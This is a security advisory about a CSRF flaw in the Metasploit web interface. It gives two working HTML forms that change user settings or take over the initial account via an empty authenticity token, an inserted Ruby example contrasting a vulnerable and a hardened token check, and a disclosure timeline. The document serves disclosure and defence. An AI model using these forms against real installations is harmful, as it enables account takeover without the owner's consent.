Metasploit Project Cross Site Request Forgery

2015-03-17T00:00:00
ID PACKETSTORM:130860
Type packetstorm
Reporter Mohamed A. Baset
Modified 2015-03-17T00:00:00

Description

# Exploit Title: Metasploit Project initial User Creation CSRF
# Google Dork: N/A  
# Date: 14-2-2015  
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)  
# Vendor Homepage: http://www.metasploit.com/  
# Software Link: http://www.rapid7.com/products/metasploit/editions-and-features.jsp
# Version: Free/Pro < 4.11.1 (Update 2015021901)  
# Tested on: All OS  
# CVE : N/A  
  
Vulnerability:  
Cross Site Request Forgery - (CSRF)  
  
Info:  
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)  
  
More Details:  
After doing some research, I found that the anti-CSRF token "authenticity_token" is not validated on the server side of the local Metasploit web interface: a request that carries an empty token is accepted. This exposes every state-changing form in the local Metasploit Project to CSRF.
  
Affected URL(s)/PoC Code(s):  
-Change Local Metasploit Project User Settings  
<html>  
<body>  
<form action="https://127.0.0.1:3790/users/1" method="POST">  
<input type="hidden" name="utf8" value="✓" />  
<input type="hidden" name="_method" value="put" />  
<input type="hidden" name="authenticity_token" value="" />  
<input type="hidden" name="user[fullname]" value="Attacker" />  
<input type="hidden" name="user[email]" value="EMAIL" />  
<input type="hidden" name="user[company]" value="COMPANY" />  
<input type="hidden" name="user[time_zone]" value="Cairo" />  
<input type="hidden" name="commit" value="Save Settings" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
  
-Full Local Metasploit Project Account Takeover before setting up the first user settings
<html>  
<body>  
<form action="https://127.0.0.1:3790/users" method="POST">  
<input type="hidden" name="utf8" value="✓" />  
<input type="hidden" name="authenticity_token" value="" />  
<input type="hidden" name="user[username]" value="Username" />  
<input type="hidden" name="user[password]" value="PASSWORD" />  
<input type="hidden" name="user[password_confirmation]" value="PASSWORD" />
<input type="hidden" name="user[fullname]" value="FUll_Name" />  
<input type="hidden" name="user[email]" value="EMAIL" />  
<input type="hidden" name="user[company]" value="COMPANY" />  
<input type="hidden" name="user[time_zone]" value="Cairo" />  
<input type="hidden" name="commit" value="Create Account" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
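The advisory's point is the missing server-side check, and both PoC forms above rely on it by submitting authenticity_token="". The Metasploit web UI is a Rails application, so the following Ruby model of a Rails-style verification step is added here as an illustration; it is not Metasploit's or Rapid7's code, and the module, method and parameter names are this example's own. It shows a vulnerable variant that waves through a blank token (the behaviour the advisory describes) next to a hardened variant that requires the token, ties it to the session and compares it in constant time, then runs both against a request constructed to match the account-creation PoC.

```ruby
require 'securerandom'

# Added example, not Metasploit's own code: a minimal model of the check a
# Rails-style app must run on "authenticity_token" for every state-changing
# request. Names (CsrfGuard, issue_token, authorize, ...) are assumptions.
module CsrfGuard
  SAFE_METHODS = %w[GET HEAD OPTIONS].freeze
  OVERRIDABLE  = %w[PUT PATCH DELETE].freeze

  # Issue (or reuse) a random per-session token. The server embeds it in
  # each form it renders; a page on another origin cannot read it.
  def self.issue_token(session)
    session[:_csrf_token] ||= SecureRandom.base64(32)
  end

  # The first PoC sends _method=put in a POST. The override has to be
  # resolved before deciding whether the request is state-changing; this
  # example only honours overrides to PUT, PATCH and DELETE.
  def self.effective_method(method, params)
    m = method.to_s.upcase
    override = params['_method'].to_s.upcase
    m == 'POST' && OVERRIDABLE.include?(override) ? override : m
  end

  # Constant-time comparison so the token cannot be recovered byte by byte
  # through response timing.
  def self.secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    diff = 0
    a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
    diff.zero?
  end

  # BUG, modelled on the advisory: a missing or empty token is treated as
  # "no token required" and the request is accepted.
  def self.vulnerable_token_valid?(session, params)
    submitted = params['authenticity_token']
    return true if submitted.nil? || submitted.empty?
    submitted == session[:_csrf_token]
  end

  # Fixed: the request must carry a token, the session must hold one, and
  # the two must match.
  def self.hardened_token_valid?(session, params)
    submitted = params['authenticity_token'].to_s
    expected  = session[:_csrf_token].to_s
    return false if submitted.empty? || expected.empty?
    secure_compare(submitted, expected)
  end

  # Returns :ok or :forbidden; safe (read-only) methods skip the check.
  def self.authorize(method, session, params, check)
    return :ok if SAFE_METHODS.include?(effective_method(method, params))
    send(check, session, params) ? :ok : :forbidden
  end
end

# Constructed request modelled on the account-creation PoC above: a
# cross-origin POST whose authenticity_token is empty.
POC_PARAMS = {
  'utf8' => '✓',
  'authenticity_token' => '',
  'user[username]' => 'Username',
  'user[password]' => 'PASSWORD',
  'commit' => 'Create Account'
}.freeze

def demo
  session = {}
  CsrfGuard.issue_token(session)
  {
    # Vulnerable server: the forged request creates the account.
    vulnerable: CsrfGuard.authorize('POST', session, POC_PARAMS, :vulnerable_token_valid?),
    # Patched server: the same request is rejected.
    hardened:   CsrfGuard.authorize('POST', session, POC_PARAMS, :hardened_token_valid?),
    # A legitimate form rendered by the server carries the session token.
    legitimate: CsrfGuard.authorize('POST', session,
                  POC_PARAMS.merge('authenticity_token' => session[:_csrf_token]),
                  :hardened_token_valid?)
  }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

The account-takeover PoC works before the first user exists, when there is no authenticated session at all; the hardened check still rejects it because the session token is absent, not just because the submitted one is blank. A patched instance can be verified by submitting the server's own form normally (accepted) and then repeating the same submission with the token field cleared, which must now return a forbidden response.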
  
  
More Details/Impact:  
-Change Local Metasploit Project User Settings  
-Full Local Metasploit Project Account Takeover before setting up the first user settings
  
Report Timeline:  
[-] 14/02/2015: Reported to Rapid7 Security Team  
[-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability  
[-] 17/02/2015: Reply from "Eray Yilmaz" about the operation and public disclosure rules
[-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the vulnerability; fixed in Update 4.11.1 (Update 2015021901), https://community.rapid7.com/docs/DOC-3010
[-] 16/03/2015: Public Disclosure  
  
Thanks  
  
--
Best Regards,

Mohamed Abdelbaset Elnoby
Guru Programmer, Information Security Evangelist & Bug Bounty Hunter.
LinkedIn: https://www.linkedin.com/in/symbiansymoh
Curriculum Vitae: http://goo.gl/cNrVpL
Facebook: https://fb.com/symbiansymoh
Twitter: https://twitter.com/symbiansymoh